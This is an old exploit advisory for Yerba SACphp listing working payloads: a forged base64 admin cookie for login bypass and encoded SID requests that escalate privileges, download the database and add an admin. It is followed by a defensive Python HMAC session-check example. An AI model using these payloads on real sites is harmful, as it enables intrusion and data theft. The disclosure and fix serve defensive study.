[*]~======================================================~[*]

[*] Yerba SACphp <= 6.3 Multiple Remote Vulnerabilities [*]

[*]~======================================================~[*]

[?] Discovered By StAkeR - StAkeR[at]hotmail[dot]it
[?] Discovered On 07/10/2008
[?] http://downloads.sourceforge.net/yerba/SACphp-6_28.tgz?modtime=1025222400&big_mirror=0

[?] Admin Login ByPass
[?] javascript:document.cookie="galleta[sesion]=MToxOkFkbWluaXN0cmFkb3IgZGVsIFNpc3RlbWE6Jw=="

[?] Privilege Escalation
[?] index.php?SID=[path (base64 encoded)]

[?] Arbitrary Database Download
[?] index.php?SID=Jm9kbGFwc2VyPXhmJmFtZXRzaXM9cG9tJm5pbWRBQkR5PWRvbQ==

[?] Arbitrary Add Admin
[?] index.php?SID=JnJhZ2VyZ2E9eGYmYW1ldHNpcz1wb20mc29pcmF1c1V5PWRvbQ==

# milw0rm.com [2008-10-07]
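
[+] Added example, not part of the original advisory and not SACphp code: the login bypass above works because a bare base64 cookie that the browser can set is accepted as the session. The Python sketch below shows the server-side check that rejects such a value by requiring an HMAC tag. The cookie layout, key handling, lifetime and all function names are assumptions made for illustration.

```python
import base64
import hashlib
import hmac
import secrets
import time

SECRET_KEY = secrets.token_bytes(32)  # assumption: server-side key, never sent to the client
MAX_AGE = 3600                        # assumption: session lifetime in seconds
# Cookie value quoted in the advisory: plain base64, no integrity tag.
ADVISORY_COOKIE = "MToxOkFkbWluaXN0cmFkb3IgZGVsIFNpc3RlbWE6Jw=="

def b64e(data):
    return base64.urlsafe_b64encode(data).decode().rstrip("=")

def b64d(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def make_tag(payload):
    return b64e(hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).digest())

def issue_session(user_id, role, now=None):
    """Return 'payload.tag': the payload stays readable, the tag makes it unforgeable."""
    issued = int(time.time() if now is None else now)
    payload = b64e(f"{user_id}:{issued}:{role}".encode())
    return f"{payload}.{make_tag(payload)}"

def verify_session(cookie, now=None):
    """Return (user_id, role) for an unexpired cookie this server issued, else None."""
    payload, sep, tag = cookie.partition(".")
    if not sep:
        return None  # bare base64 without a tag, as in the advisory
    # Constant-time comparison on bytes, so odd input cannot raise or leak timing.
    if not hmac.compare_digest(tag.encode(), make_tag(payload).encode()):
        return None
    try:
        user_id, issued, role = b64d(payload).decode().split(":", 2)
        user_id, issued = int(user_id), int(issued)
    except ValueError:
        return None
    current = time.time() if now is None else now
    if current - issued > MAX_AGE:
        return None
    return user_id, role

if __name__ == "__main__":
    good = issue_session(7, "operator")
    print("issued cookie   ->", verify_session(good))
    print("advisory cookie ->", verify_session(ADVISORY_COOKIE))
```

The role and user id must still be re-checked against the database on privileged actions; the tag only proves the server issued the value.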